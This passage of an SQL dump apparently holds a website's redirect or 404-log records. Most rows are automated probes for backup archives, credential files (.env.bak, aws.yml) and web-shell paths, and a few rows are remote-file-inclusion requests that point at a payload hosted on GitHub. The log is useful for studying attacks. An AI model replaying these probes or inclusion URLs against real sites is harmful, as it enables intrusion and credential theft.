00:00:00',301),(20708,'https://ekvatorprint.com.ua/deploy.tgz',NULL,'http://ekvatorprint.com.ua/deploy.tgz','',1,0,'2021-08-27 17:51:04','0000-00-00 00:00:00',301),(20709,'https://ekvatorprint.com.ua/include.tgz',NULL,'http://ekvatorprint.com.ua/include.tgz','',3,0,'2021-08-27 18:01:43','0000-00-00 00:00:00',301),(20710,'https://ekvatorprint.com.ua/inc.tgz',NULL,'http://ekvatorprint.com.ua/inc.tgz','',3,0,'2021-08-27 18:12:45','0000-00-00 00:00:00',301),(20711,'https://ekvatorprint.com.ua/lib.tgz',NULL,'http://ekvatorprint.com.ua/lib.tgz','',1,0,'2021-08-27 18:23:20','0000-00-00 00:00:00',301),(20712,'https://ekvatorprint.com.ua/sites.tgz',NULL,'http://ekvatorprint.com.ua/sites.tgz','',1,0,'2021-08-27 18:34:00','0000-00-00 00:00:00',301),(20713,'https://ekvatorprint.com.ua/local.tgz',NULL,'http://ekvatorprint.com.ua/local.tgz','',1,0,'2021-08-27 18:44:46','0000-00-00 00:00:00',301),(20714,'https://ekvatorprint.com.ua/last.tgz',NULL,'http://ekvatorprint.com.ua/last.tgz','',1,0,'2021-08-27 18:55:33','0000-00-00 00:00:00',301),(20715,'https://ekvatorprint.com.ua/articles.tgz',NULL,'http://ekvatorprint.com.ua/articles.tgz','',1,0,'2021-08-27 19:06:18','0000-00-00 00:00:00',301),(20716,'https://ekvatorprint.com.ua/panel.tgz',NULL,'http://ekvatorprint.com.ua/panel.tgz','',1,0,'2021-08-27 19:17:09','0000-00-00 00:00:00',301),(20717,'https://ekvatorprint.com.ua/user.tgz',NULL,'http://ekvatorprint.com.ua/user.tgz','',1,0,'2021-08-27 19:27:47','0000-00-00 00:00:00',301),(20718,'https://ekvatorprint.com.ua/cabinet.tgz',NULL,'http://ekvatorprint.com.ua/cabinet.tgz','',1,0,'2021-08-27 19:38:47','0000-00-00 00:00:00',301),(20719,'https://ekvatorprint.com.ua/ekvatorprintcomua.tar',NULL,'http://ekvatorprint.com.ua/ekvatorprintcomua.tar','',1,0,'2021-08-27 20:10:57','0000-00-00 00:00:00',301),(20720,'https://ekvatorprint.com.ua/ekvatorprint_com_ua.tar',NULL,'http://ekvatorprint.com.ua/ekvatorprint_com_ua.tar','',1,0,'2021-08-27 20:21:34','0000-00-00 00:00:00',301),(20721,'https://ekvatorprint.com.ua/public_html.tar',NULL,'http://ekvatorprint.com.ua/public_html.tar','',3,0,'2021-08-27 20:32:24','0000-00-00 00:00:00',301),(20722,'https://ekvatorprint.com.ua/archive.tar',NULL,'http://ekvatorprint.com.ua/archive.tar','',2,0,'2021-08-27 20:53:57','0000-00-00 00:00:00',301),(20723,'https://ekvatorprint.com.ua/var.tar',NULL,'http://ekvatorprint.com.ua/var.tar','',2,0,'2021-08-27 21:26:15','0000-00-00 00:00:00',301),(20724,'https://ekvatorprint.com.ua/blog.tar',NULL,'http://ekvatorprint.com.ua/blog.tar','',2,0,'2021-08-27 21:37:02','0000-00-00 00:00:00',301),(20725,'https://ekvatorprint.com.ua/html.tar',NULL,'http://ekvatorprint.com.ua/html.tar','',1,0,'2021-08-27 21:47:48','0000-00-00 00:00:00',301),(20726,'https://ekvatorprint.com.ua/data.tar',NULL,'http://ekvatorprint.com.ua/data.tar','',2,0,'2021-08-27 21:58:39','0000-00-00 00:00:00',301),(20727,'https://ekvatorprint.com.ua/forum.tar',NULL,'http://ekvatorprint.com.ua/forum.tar','',1,0,'2021-08-27 22:09:24','0000-00-00 00:00:00',301),(20728,'https://ekvatorprint.com.ua/new.tar',NULL,'http://ekvatorprint.com.ua/new.tar','',2,0,'2021-08-27 22:20:07','0000-00-00 00:00:00',301),(20729,'https://ekvatorprint.com.ua/application.tar',NULL,'http://ekvatorprint.com.ua/application.tar','',1,0,'2021-08-27 22:30:51','0000-00-00 00:00:00',301),(20730,'https://ekvatorprint.com.ua/app.tar',NULL,'http://ekvatorprint.com.ua/app.tar','',2,0,'2021-08-27 22:41:37','0000-00-00 00:00:00',301),(20731,'https://ekvatorprint.com.ua/home.tar',NULL,'http://ekvatorprint.com.ua/home.tar','',6,0,'2021-08-27 22:52:38','0000-00-00 00:00:00',301),(20732,'https://ekvatorprint.com.ua/old.tar',NULL,'http://ekvatorprint.com.ua/old.tar','',2,0,'2021-08-27 23:03:11','0000-00-00 00:00:00',301),(20733,'https://ekvatorprint.com.ua/engine.tar',NULL,'http://ekvatorprint.com.ua/engine.tar','',1,0,'2021-08-27 23:13:59','0000-00-00 00:00:00',301),(20734,'https://ekvatorprint.com.ua/private_html.tar',NULL,'http://ekvatorprint.com.ua/private_html.tar','',1,0,'2021-08-27 23:46:17','0000-00-00 00:00:00',301),(20735,'https://ekvatorprint.com.ua/htdocs.tar',NULL,'http://ekvatorprint.com.ua/htdocs.tar','',6,0,'2021-08-28 03:32:23','0000-00-00 00:00:00',301),(20736,'https://ekvatorprint.com.ua/deploy.tar',NULL,'http://ekvatorprint.com.ua/deploy.tar','',1,0,'2021-08-28 03:43:15','0000-00-00 00:00:00',301),(20737,'https://ekvatorprint.com.ua/include.tar',NULL,'http://ekvatorprint.com.ua/include.tar','',3,0,'2021-08-28 03:54:01','0000-00-00 00:00:00',301),(20738,'https://ekvatorprint.com.ua/inc.tar',NULL,'http://ekvatorprint.com.ua/inc.tar','',3,0,'2021-08-28 04:04:44','0000-00-00 00:00:00',301),(20739,'https://ekvatorprint.com.ua/lib.tar',NULL,'http://ekvatorprint.com.ua/lib.tar','',1,0,'2021-08-28 04:15:36','0000-00-00 00:00:00',301),(20740,'https://ekvatorprint.com.ua/sites.tar',NULL,'http://ekvatorprint.com.ua/sites.tar','',1,0,'2021-08-28 04:26:19','0000-00-00 00:00:00',301),(20741,'https://ekvatorprint.com.ua/local.tar',NULL,'http://ekvatorprint.com.ua/local.tar','',1,0,'2021-08-28 04:37:17','0000-00-00 00:00:00',301),(20742,'https://ekvatorprint.com.ua/last.tar',NULL,'http://ekvatorprint.com.ua/last.tar','',1,0,'2021-08-28 04:47:53','0000-00-00 00:00:00',301),(20743,'https://ekvatorprint.com.ua/articles.tar',NULL,'http://ekvatorprint.com.ua/articles.tar','',1,0,'2021-08-28 04:58:45','0000-00-00 00:00:00',301),(20744,'https://ekvatorprint.com.ua/panel.tar',NULL,'http://ekvatorprint.com.ua/panel.tar','',1,0,'2021-08-28 05:09:38','0000-00-00 00:00:00',301),(20745,'https://ekvatorprint.com.ua/user.tar',NULL,'http://ekvatorprint.com.ua/user.tar','',1,0,'2021-08-28 05:20:32','0000-00-00 00:00:00',301),(20746,'https://ekvatorprint.com.ua/cabinet.tar',NULL,'http://ekvatorprint.com.ua/cabinet.tar','',1,0,'2021-08-28 05:31:26','0000-00-00 00:00:00',301),(20747,'https://ekvatorprint.com.ua/wp-content/plugins/ioptimization/ioptimize.php?rchk=',NULL,'','',1,0,'2021-08-28 18:55:23','0000-00-00 00:00:00',301),(20748,'https://ekvatorprint.com.ua/xmlrp.php',NULL,'','',18,0,'2021-08-29 10:42:42','0000-00-00 00:00:00',301),(20749,'https://ekvatorprint.com.ua/aboutme',NULL,'','',1,0,'2021-09-02 07:38:33','0000-00-00 00:00:00',301),(20750,'https://ekvatorprint.com.ua/about',NULL,'','',2,0,'2021-09-02 07:38:34','0000-00-00 00:00:00',301),(20751,'https://ekvatorprint.com.ua/contactme',NULL,'','',1,0,'2021-09-02 07:38:37','0000-00-00 00:00:00',301),(20752,'https://ekvatorprint.com.ua/contactus',NULL,'','',1,0,'2021-09-02 07:38:38','0000-00-00 00:00:00',301),(20753,'https://ekvatorprint.com.ua/adminer.sql.gz',NULL,'','',2,0,'2021-09-05 02:38:12','0000-00-00 00:00:00',301),(20754,'https://ekvatorprint.com.ua/forum/adminer.sql',NULL,'','',1,0,'2021-09-05 02:38:12','0000-00-00 00:00:00',301),(20755,'https://ekvatorprint.com.ua/forum/adminer.php',NULL,'','',1,0,'2021-09-05 02:38:12','0000-00-00 00:00:00',301),(20756,'https://ekvatorprint.com.ua/forum/adminer.sql.gz',NULL,'','',1,0,'2021-09-05 02:38:12','0000-00-00 00:00:00',301),(20757,'https://ekvatorprint.com.ua/forums/adminer.sql',NULL,'','',1,0,'2021-09-05 02:38:13','0000-00-00 00:00:00',301),(20758,'https://ekvatorprint.com.ua/forums/adminer.php',NULL,'','',1,0,'2021-09-05 02:38:13','0000-00-00 00:00:00',301),(20759,'https://ekvatorprint.com.ua/forums/adminer.sql.gz',NULL,'','',1,0,'2021-09-05 02:38:13','0000-00-00 00:00:00',301),(20760,'https://ekvatorprint.com.ua/board/adminer.sql',NULL,'','',1,0,'2021-09-05 02:38:13','0000-00-00 00:00:00',301),(20761,'https://ekvatorprint.com.ua/board/adminer.php',NULL,'','',1,0,'2021-09-05 02:38:13','0000-00-00 00:00:00',301),(20762,'https://ekvatorprint.com.ua/board/adminer.sql.gz',NULL,'','',1,0,'2021-09-05 02:38:13','0000-00-00 00:00:00',301),(20763,'https://ekvatorprint.com.ua/vb/adminer.sql',NULL,'','',1,0,'2021-09-05 02:38:14','0000-00-00 00:00:00',301),(20764,'https://ekvatorprint.com.ua/vb/adminer.php',NULL,'','',1,0,'2021-09-05 02:38:14','0000-00-00 00:00:00',301),(20765,'https://ekvatorprint.com.ua/vb/adminer.sql.gz',NULL,'','',1,0,'2021-09-05 02:38:14','0000-00-00 00:00:00',301),(20766,'https://ekvatorprint.com.ua/phpbb/adminer.sql',NULL,'','',1,0,'2021-09-05 02:38:14','0000-00-00 00:00:00',301),(20767,'https://ekvatorprint.com.ua/phpbb/adminer.php',NULL,'','',1,0,'2021-09-05 02:38:14','0000-00-00 00:00:00',301),(20768,'https://ekvatorprint.com.ua/phpbb/adminer.sql.gz',NULL,'','',1,0,'2021-09-05 02:38:14','0000-00-00 00:00:00',301),(20769,'https://ekvatorprint.com.ua/phpbb2/adminer.sql',NULL,'','',1,0,'2021-09-05 02:38:15','0000-00-00 00:00:00',301),(20770,'https://ekvatorprint.com.ua/phpbb2/adminer.php',NULL,'','',1,0,'2021-09-05 02:38:15','0000-00-00 00:00:00',301),(20771,'https://ekvatorprint.com.ua/phpbb2/adminer.sql.gz',NULL,'','',1,0,'2021-09-05 02:38:15','0000-00-00 00:00:00',301),(20772,'https://ekvatorprint.com.ua/phpbb3/adminer.sql',NULL,'','',1,0,'2021-09-05 02:38:15','0000-00-00 00:00:00',301),(20773,'https://ekvatorprint.com.ua/phpbb3/adminer.php',NULL,'','',1,0,'2021-09-05 02:38:15','0000-00-00 00:00:00',301),(20774,'https://ekvatorprint.com.ua/phpbb3/adminer.sql.gz',NULL,'','',1,0,'2021-09-05 02:38:16','0000-00-00 00:00:00',301),(20775,'https://ekvatorprint.com.ua/components/com_jce/editor/tiny_mce/plugins/imgmanager_ext/classes/image/imagick.php',NULL,'','',1,0,'2021-09-05 08:24:56','0000-00-00 00:00:00',301),(20776,'https://ekvatorprint.com.ua/&amp;sa=u&amp;ved=2ahukewiu576omfhyahwiecakhr1cbuy4chawegqivxac&amp;usg=aovvaw1aybi1a5biw0jvc9oxyhfq',NULL,'http://ekvatorprint.com.ua/&sa=U&ved=2ahUKEwiu576omfHyAhWIecAKHR1cBUY4ChAWegQIVxAC&usg=AOvVaw1aYBi1A5biW0jVC9oXyHFq','',1,0,'2021-09-09 05:51:05','0000-00-00 00:00:00',301),(20777,'https://ekvatorprint.com.ua/printing-on-canvas&amp;sa=u&amp;ved=2ahukewjf2uqyw_hyahusszabhewnc_s4chawegqihbac&amp;usg=aovvaw3qfxgwq3f2qgves9vb6gfz',NULL,'http://ekvatorprint.com.ua/printing-on-canvas&sa=U&ved=2ahUKEwjF2uqYw_HyAhUSSzABHeWnC_s4ChAWegQIHBAC&usg=AOvVaw3QFXGWq3F2QgVes9Vb6GFz','',1,0,'2021-09-09 08:58:28','0000-00-00 00:00:00',301),(20778,'https://ekvatorprint.com.ua/printing-on-canvas&sa=u&ved=2ahukewikunzmyczwahvmx4skhaezbqeqtwiwbxoecauqaq&usg=aovvaw3htpesaxctllhfolwwetkh',NULL,'','',2,0,'2021-09-10 07:44:15','0000-00-00 00:00:00',301),(20779,'https://ekvatorprint.com.ua/printing-on-vinyldata:image/svg+xml;base64,phn2zyb4bwxucz0iahr0cdovl3d3dy53my5vcmcvmjawmc9zdmciihdpzhropsiyotuiighlawdodd0imjuxij48l3n2zz4=',NULL,'','',1,0,'2021-09-11 04:45:36','0000-00-00 00:00:00',301),(20780,'https://ekvatorprint.com.ua/printing-on-vinyldata:image/svg+xml;base64,phn2zyb4bwxucz0iahr0cdovl3d3dy53my5vcmcvmjawmc9zdmciihdpzhropsi2mdaiighlawdodd0imzqzij48l3n2zz4=',NULL,'','',1,0,'2021-09-11 04:45:36','0000-00-00 00:00:00',301),(20781,'https://ekvatorprint.com.ua/printing-on-vinyldata:image/svg+xml;base64,phn2zyb4bwxucz0iahr0cdovl3d3dy53my5vcmcvmjawmc9zdmciihdpzhropsiymdaiighlawdodd0imtawij48l3n2zz4=',NULL,'','',1,0,'2021-09-11 04:45:36','0000-00-00 00:00:00',301),(20782,'https://ekvatorprint.com.ua/printing-on-vinyldata:image/svg+xml;base64,phn2zyb4bwxucz0iahr0cdovl3d3dy53my5vcmcvmjawmc9zdmciihdpzhropsiymdaiighlawdodd0iodaipjwvc3znpg==',NULL,'','',1,0,'2021-09-11 04:45:36','0000-00-00 00:00:00',301),(20783,'https://ekvatorprint.com.ua/printing-on-vinyldata:image/svg+xml;base64,phn2zyb4bwxucz0iahr0cdovl3d3dy53my5vcmcvmjawmc9zdmciihdpzhropsiymdaiighlawdodd0imtm2ij48l3n2zz4=',NULL,'','',1,0,'2021-09-11 04:45:37','0000-00-00 00:00:00',301),(20784,'https://ekvatorprint.com.ua/printing-on-vinyldata:image/svg+xml;base64,phn2zyb4bwxucz0iahr0cdovl3d3dy53my5vcmcvmjawmc9zdmciihdpzhropsiyntaiighlawdodd0imtc1ij48l3n2zz4=',NULL,'','',1,0,'2021-09-11 04:45:37','0000-00-00 00:00:00',301),(20785,'https://ekvatorprint.com.ua/printing-on-vinyldata:image/svg+xml;base64,phn2zyb4bwxucz0iahr0cdovl3d3dy53my5vcmcvmjawmc9zdmciihdpzhropsi2mdaiighlawdodd0imjgzij48l3n2zz4=',NULL,'','',1,0,'2021-09-11 04:45:37','0000-00-00 00:00:00',301),(20786,'https://ekvatorprint.com.ua/printing-on-vinyldata:image/svg+xml;base64,phn2zyb4bwxucz0iahr0cdovl3d3dy53my5vcmcvmjawmc9zdmciihdpzhropsixntqiighlawdodd0intyipjwvc3znpg==',NULL,'','',1,0,'2021-09-11 04:45:37','0000-00-00 00:00:00',301),(20787,'https://ekvatorprint.com.ua/printing-on-vinyldata:image/svg+xml;base64,phn2zyb4bwxucz0iahr0cdovl3d3dy53my5vcmcvmjawmc9zdmciihdpzhropsiyodgiighlawdodd0imjuxij48l3n2zz4=',NULL,'','',1,0,'2021-09-11 04:45:38','0000-00-00 00:00:00',301),(20788,'https://ekvatorprint.com.ua/fm.php',NULL,'','',1,0,'2021-09-11 20:08:37','0000-00-00 00:00:00',301),(20789,'https://ekvatorprint.com.ua/haccess.php?send=ok',NULL,'','',3,0,'2021-09-12 20:50:05','0000-00-00 00:00:00',301),(20790,'https://ekvatorprint.com.ua/filemanager/dialog.php',NULL,'','',5,0,'2021-09-15 12:25:48','0000-00-00 00:00:00',301),(20791,'https://ekvatorprint.com.ua/telerik.web.ui.webresource.axd?type=rau',NULL,'','',1,0,'2021-09-17 14:08:32','0000-00-00 00:00:00',301),(20792,'https://ekvatorprint.com.ua/wp-content/plugins/',NULL,'','',2,0,'2021-09-17 15:51:54','0000-00-00 00:00:00',301),(20793,'https://ekvatorprint.com.ua/_profiler/phpinfo',NULL,'','',60,0,'2021-09-18 19:49:29','0000-00-00 00:00:00',301),(20794,'https://ekvatorprint.com.ua/aws.yml',NULL,'','',48,0,'2021-09-18 19:49:34','0000-00-00 00:00:00',301),(20795,'https://ekvatorprint.com.ua/.env.bak',NULL,'','',54,0,'2021-09-18 19:49:35','0000-00-00 00:00:00',301),(20796,'https://ekvatorprint.com.ua/config/aws.yml',NULL,'','',49,0,'2021-09-18 19:49:42','0000-00-00 00:00:00',301),(20797,'https://ekvatorprint.com.ua/config.js',NULL,'','',45,0,'2021-09-18 19:49:47','0000-00-00 00:00:00',301),(20798,'https://ekvatorprint.com.ua/wp-class.php',NULL,'','',14,0,'2021-09-18 21:49:46','0000-00-00 00:00:00',301),(20799,'https://ekvatorprint.com.ua/rp-sw.js',NULL,'','',1,0,'2021-09-22 03:00:05','0000-00-00 00:00:00',301),(20800,'https://ekvatorprint.com.ua/old-site',NULL,'http://ekvatorprint.com.ua/old-site','',10,0,'2021-09-24 04:30:50','0000-00-00 00:00:00',301),(20801,'https://ekvatorprint.com.ua/oldsite',NULL,'http://ekvatorprint.com.ua/oldsite','',9,0,'2021-09-24 04:30:50','0000-00-00 00:00:00',301),(20802,'https://ekvatorprint.com.ua/images/packingprice.jpg',NULL,'https://ekvatorprint.com.ua/administrator/index.php?option=com_content&view=article&layout=edit&id=6','',1,0,'2021-09-27 12:33:44','0000-00-00 00:00:00',301),(20803,'https://ekvatorprint.com.ua/script.js',NULL,'','',11,0,'2021-09-29 06:42:21','0000-00-00 00:00:00',301),(20804,'https://ekvatorprint.com.ua/wpindex.php?idb=https://raw.githubusercontent.com/carlosdechia/carlosdechia/main/exv1',NULL,'anonymousfox.co','',9,0,'2021-09-29 07:15:27','0000-00-00 00:00:00',301),(20805,'https://ekvatorprint.com.ua/larva.php?idb=https://raw.githubusercontent.com/carlosdechia/carlosdechia/main/exv1',NULL,'anonymousfox.co','',17,0,'2021-09-29 07:15:34','0000-00-00 00:00:00',301),(20806,'https://ekvatorprint.com.ua/th3_err0r.php?php=https://raw.githubusercontent.com/carlosdechia/carlosdechia/main/exv1',NULL,'anonymousfox.co','',17,0,'2021-09-29 07:15:37','0000-00-00 00:00:00',301),(20807,'https://ekvatorprint.com.ua/wp-mails.php',NULL,'http://ekvatorprint.com.ua/wp-mails.php','',2,0,'2021-09-30 12:18:59','0000-00-00 00:00:00',301),(20808,'https://ekvatorprint.com.ua/stindex.php',NULL,'http://ekvatorprint.com.ua/stindex.php','',3,0,'2021-09-30 12:36:24','0000-00-00 00:00:00',301),(20809,'https://ekvatorprint.com.ua/autoload_classmap.php',NULL,'http://ekvatorprint.com.ua/autoload_classmap.php','',14,0,'2021-09-30 13:47:19','0000-00-00 00:00:00',301),(20810,'https://ekvatorprint.com.ua/wp-apps.php',NULL,'http://ekvatorprint.com.ua/wp-apps.php','',1,0,'2021-09-30 14:08:25','0000-00-00 00:00:00',301),(20811,'https://ekvatorprint.com.ua/vindex.php',NULL,'http://ekvatorprint.com.ua/vindex.php','',2,0,'2021-09-30 14:38:53','0000-00-00 00:00:00',301),(20812,'https://ekvatorprint.com.ua/wp-links-opmls.php',NULL,'http://ekvatorprint.com.ua/wp-links-opmls.php','',2,0,'2021-09-30 15:10:07','0000-00-00 00:00:00',301),(20813,'https://ekvatorprint.com.ua/wp-configs.php',NULL,'http://ekvatorprint.com.ua/wp-configs.php','',2,0,'2021-09-30 15:27:56','0000-00-00 00:00:00',301),(20814,'https://ekvatorprint.com.ua/wp-activates.php',NULL,'http://ekvatorprint.com.ua/wp-activates.php','',1,0,'2021-09-30 17:04:52','0000-00-00 00:00:00',301),(20815,'https://ekvatorprint.com.ua/wp-loads.php',NULL,'http://ekvatorprint.com.ua/wp-loads.php','',1,0,'2021-09-30 17:05:06','0000-00-00 00:00:00',301),(20816,'https://ekvatorprint.com.ua/files.php',NULL,'http://ekvatorprint.com.ua/files.php','',4,0,'2021-09-30 17:19:08','0000-00-00 00:00:00',301),(20817,'https://ekvatorprint.com.ua/wp-activate.php',NULL,'http://ekvatorprint.com.ua/wp-activate.php','',1,0,'2021-09-30 17:37:01','0000-00-00 00:00:00',301),(20818,'https://ekvatorprint.com.ua/wp-blog-header.php',NULL,'http://ekvatorprint.com.ua/wp-blog-header.php','',1,0,'2021-09-30 18:06:20','0000-00-00 00:00:00',301),(20819,'https://ekvatorprint.com.ua/uindex.php',NULL,'http://ekvatorprint.com.ua/uindex.php','',1,0,'2021-09-30 20:33:51','0000-00-00 00:00:00',301),(20820,'https://ekvatorprint.com.ua/banner-printing/media/jui/js/jquery.min.js?acf16b57b327875815ebef44adc986e1',NULL,'','',2,0,'2021-10-01 09:04:58','0000-00-00 00:00:00',301),(20821,'https://ekvatorprint.com.ua/banner-printing/media/jui/js/jquery-noconflict.js?acf16b57b327875815ebef44adc986e1',NULL,'','',2,0,'2021-10-01 09:04:59','0000-00-00 00:00:00',301),(20822,'https://ekvatorprint.com.ua/banner-printing/media/jui/js/jquery-migrate.min.js?acf16b57b327875815ebef44adc986e1',NULL,'','',2,0,'2021-10-01 09:05:00','0000-00-00 00:00:00',301),(20823,'https://ekvatorprint.com.ua/banner-printing/media/plg_content_mavikthumbnails/slimbox2/js/slimbox2.js',NULL,'','',2,0,'2021-10-01 09:05:01','0000-00-00 00:00:00',301),(20824,'https://ekvatorprint.com.ua/banner-printing/media/plg_jchoptimize/js/ls.loader.js',NULL,'','',2,0,'2021-10-01 09:05:01','0000-00-00 00:00:00',301),(20825,'https://ekvatorprint.com.ua/banner-printing/media/plg_jchoptimize/js/lazysizes.js',NULL,'','',2,0,'2021-10-01 09:05:02','0000-00-00 00:00:00',301),(20826,'https://ekvatorprint.com.ua/banner-printing/templates/gk_ilife/lib/scripts/template_scripts.js',NULL,'','',2,0,'2021-10-01 09:05:02','0000-00-00 00:00:00',301),(20827,'https://ekvatorprint.com.ua/banner-printing/media/youtube/play2.js',NULL,'','',2,0,'2021-10-01 09:05:03','0000-00-00 00:00:00',301),(20828,'https://ekvatorprint.com.ua/language/en-gb/gank.php.php',NULL,'http://ekvatorprint.com.ua/language/en-GB/gank.php.PhP','',1,0,'2021-10-02 04:13:41','0000-00-00 00:00:00',301),(20829,'https://ekvatorprint.com.ua/cache/beence.php.suspected',NULL,'http://ekvatorprint.com.ua/cache/beence.php.suspected','',1,0,'2021-10-02 06:09:37','0000-00-00 00:00:00',301),(20830,'https://ekvatorprint.com.ua/wp-content/plugins/gatewayapi/inc/security_two_factor.php',NULL,'http://ekvatorprint.com.ua/wp-content/plugins/gatewayapi/inc/security_two_factor.php','',2,0,'2021-10-02 06:31:12','0000-00-00 00:00:00',301),(20831,'https://ekvatorprint.com.ua/modules/mod_myblog_archive/mod_myblog_archive1.php',NULL,'http://ekvatorprint.com.ua/modules/mod_myblog_archive/mod_myblog_archive1.php','',1,0,'2021-10-02 07:15:29','0000-00-00 00:00:00',301),(20832,'https://ekvatorprint.com.ua/wp-content/themes/plaintext/includes/custom-header.php',NULL,'http://ekvatorprint.com.ua/wp-content/themes/plaintext/includes/custom-header.php','',2,0,'2021-10-02 07:31:49','0000-00-00 00:00:00',301),(20833,'https://ekvatorprint.com.ua/xxxwolfxsamxadooxxx/ok5b2xs.php',NULL,'http://ekvatorprint.com.ua/xxxwolfxsamxadooxxx/ok5b2xs.php','',2,0,'2021-10-02 13:30:58','0000-00-00 00:00:00',301),(20834,'https://ekvatorprint.com.ua/wordpress/files.php',NULL,'http://ekvatorprint.com.ua/wordpress/files.php','',1,0,'2021-10-02 14:38:07','0000-00-00 00:00:00',301),(20835,'https://ekvatorprint.com.ua/class-wp-archives.php',NULL,'http://ekvatorprint.com.ua/class-wp-archives.php','',2,0,'2021-10-02 14:39:19','0000-00-00 00:00:00',301),(20836,'https://ekvatorprint.com.ua/wordpress/wp.php',NULL,'http://ekvatorprint.com.ua/wordpress/wp.php','',1,0,'2021-10-02 14:44:28','0000-00-00 00:00:00',301),(20837,'https://ekvatorprint.com.ua/wordpress/names.php',NULL,'http://ekvatorprint.com.ua/wordpress/names.php','',1,0,'2021-10-02 14:55:16','0000-00-00 00:00:00',301),(20838,'https://ekvatorprint.com.ua/mussa.php',NULL,'http://ekvatorprint.com.ua/mussa.php','',1,0,'2021-10-02 14:56:43','0000-00-00 00:00:00',301),(20839,'https://ekvatorprint.com.ua/tester.php',NULL,'http://ekvatorprint.com.ua/tester.php','',1,0,'2021-10-02 15:14:25','0000-00-00 00:00:00',301),(20840,'https://ekvatorprint.com.ua/isis.php',NULL,'http://ekvatorprint.com.ua/isis.php','',1,0,'2021-10-02 15:30:52','0000-00-00 00:00:00',301),(20841,'https://ekvatorprint.com.ua/reskyber.php',NULL,'http://ekvatorprint.com.ua/reskyber.php','',1,0,'2021-10-02 16:08:10','0000-00-00 00:00:00',301),(20842,'https://ekvatorprint.com.ua/wsa.php',NULL,'http://ekvatorprint.com.ua/wsa.php','',2,0,'2021-10-02 17:23:22','0000-00-00 00:00:00',301),(20843,'https://ekvatorprint.com.ua/enki.php',NULL,'http://ekvatorprint.com.ua/ENKI.php','',5,0,'2021-10-02 18:06:07','0000-00-00 00:00:00',301),(20844,'https://ekvatorprint.com.ua/alwso.php',NULL,'http://ekvatorprint.com.ua/alwso.php','',10,0,'2021-10-02 21:21:25','0000-00-00 00:00:00',301),(20845,'https://ekvatorprint.com.ua/fox.php',NULL,'http://ekvatorprint.com.ua/fox.php','',8,0,'2021-10-02 22:22:39','0000-00-00 00:00:00',301),(20846,'https://ekvatorprint.com.ua/sh.php',NULL,'http://ekvatorprint.com.ua/sh.php','',5,0,'2021-10-03 03:27:52','0000-00-00 00:00:00',301),(20847,'https://ekvatorprint.com.ua/wp-admin/user/privacy.php',NULL,'http://ekvatorprint.com.ua/wp-admin/user/privacy.php','',2,0,'2021-10-03 04:16:37','0000-00-00 00:00:00',301),(20848,'https://ekvatorprint.com.ua/octeesfes.php',NULL,'http://ekvatorprint.com.ua/octeesfes.php','',1,0,'2021-10-03 04:17:00','0000-00-00 00:00:00',301),(20849,'https://ekvatorprint.com.ua/langar.php',NULL,'http://ekvatorprint.com.ua/langar.php','',2,0,'2021-10-03 04:31:23','0000-00-00 00:00:00',301),(20850,'https://ekvatorprint.com.ua/wp-22.php',NULL,'http://ekvatorprint.com.ua/wp-22.php','',11,0,'2021-10-03 04:39:23','0000-00-00 00:00:00',301),(20851,'https://ekvatorprint.com.ua/wp-conctent.php',NULL,'http://ekvatorprint.com.ua/wp-conctent.php','',2,0,'2021-10-03 04:46:24','0000-00-00 00:00:00',301),(20852,'https://ekvatorprint.com.ua/wordpress/wp-content/plugins/fighter/wp-blog.php',NULL,'http://ekvatorprint.com.ua/wordpress/wp-content/plugins/fighter/wp-blog.php','',2,0,'2021-10-03 04:53:30','0000-00-00 00:00:00',301),(20853,'https://ekvatorprint.com.ua/wp-comments-post.php',NULL,'http://ekvatorprint.com.ua/wp-comments-post.php','',3,0,'2021-10-03 05:06:11','0000-00-00 00:00:00',301),(20854,'https://ekvatorprint.com.ua/wp-connect.php',NULL,'http://ekvatorprint.com.ua/wp-connect.php','',1,0,'2021-10-03 05:06:47','0000-00-00 00:00:00',301),(20855,'https://ekvatorprint.com.ua/sanagers.php',NULL,'http://ekvatorprint.com.ua/sanagers.php','',1,0,'2021-10-03 05:15:28','0000-00-00 00:00:00',301),(20856,'https://ekvatorprint.com.ua/wordpress/wp-content/plugins/fighter/upx.php',NULL,'http://ekvatorprint.com.ua/wordpress/wp-content/plugins/fighter/upx.php','',2,0,'2021-10-03 05:34:47','0000-00-00 00:00:00',301),(20857,'https://ekvatorprint.com.ua/wordpress/wp-content/plugins/elingkuatslamet/tes.php',NULL,'http://ekvatorprint.com.ua/wordpress/wp-content/plugins/ElingKuatSlamet/tes.php','',2,0,'2021-10-03 05:39:37','0000-00-00 00:00:00',301),(20858,'https://ekvatorprint.com.ua/wp-admin/link-edd.php',NULL,'http://ekvatorprint.com.ua/wp-admin/link-edd.php','',1,0,'2021-10-03 05:52:21','0000-00-00 00:00:00',301),(20859,'https://ekvatorprint.com.ua/wordpress/wp-content/plugins/masterx/upx.php',NULL,'http://ekvatorprint.com.ua/wordpress/wp-content/plugins/masterx/upx.php','',3,0,'2021-10-03 06:11:35','0000-00-00 00:00:00',301),(20860,'https://ekvatorprint.com.ua/edit-form.php',NULL,'http://ekvatorprint.com.ua/edit-form.php','',5,0,'2021-10-03 06:19:58','0000-00-00 00:00:00',301),(20861,'https://ekvatorprint.com.ua/lyjues.php',NULL,'http://ekvatorprint.com.ua/lyjues.php','',1,0,'2021-10-03 06:20:10','0000-00-00 00:00:00',301),(20862,'https://ekvatorprint.com.ua/wp-configer.php',NULL,'http://ekvatorprint.com.ua/wp-configer.php','',2,0,'2021-10-03 06:20:10','0000-00-00 00:00:00',301),(20863,'https://ekvatorprint.com.ua/wp-admin/nav-menus.php',NULL,'http://ekvatorprint.com.ua/wp-admin/nav-menus.php','',2,0,'2021-10-03 06:20:11','0000-00-00 00:00:00',301),(20864,'https://ekvatorprint.com.ua/wordpress/wp-content/plugins/elingkuatslamet/wp-load.php',NULL,'http://ekvatorprint.com.ua/wordpress/wp-content/plugins/ElingKuatSlamet/wp-load.php','',1,0,'2021-10-03 06:23:59','0000-00-00 00:00:00',301),(20865,'https://ekvatorprint.com.ua/scenefox.php',NULL,'http://ekvatorprint.com.ua/scenefox.php','',3,0,'2021-10-03 07:06:00','0000-00-00 00:00:00',301),(20866,'https://ekvatorprint.com.ua/wordpress/wp-content/plugins/fighter/shx.php',NULL,'http://ekvatorprint.com.ua/wordpress/wp-content/plugins/fighter/shx.php','',1,0,'2021-10-03 07:21:23','0000-00-00 00:00:00',301),(20867,'https://ekvatorprint.com.ua/sidwso.php',NULL,'http://ekvatorprint.com.ua/sidwso.php','',2,0,'2021-10-03 07:25:05','0000-00-00 